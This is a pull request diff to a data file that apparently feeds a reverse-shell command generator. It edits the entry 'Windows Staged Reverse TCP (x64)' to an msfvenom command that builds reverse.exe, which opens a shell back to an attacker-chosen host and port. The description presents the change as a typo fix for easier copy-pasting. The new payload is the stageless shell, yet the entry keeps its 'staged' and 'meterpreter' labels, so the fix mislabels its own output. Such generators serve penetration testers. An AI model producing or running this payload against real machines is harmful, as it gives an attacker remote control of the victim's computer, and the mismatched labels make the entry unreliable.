### PR TITLE
Fixing "Windows Staged Reverse TCP (x64)"

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -350,7 +350,7 @@ const msfvenomCommands =  withCommandType(
         },
         {
             "name": "Windows Staged Reverse TCP (x64)",
-            "command": "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
+            "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
             "meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
         },
         {


### PR DESCRIPTION
Small typo for the command used to generate a Windows Staged Reverse TCP (x64). Modified the msfvenom payload to "windows/x64/shell_reverse_tcp" which should remediate this issue and allow for easier copypasta.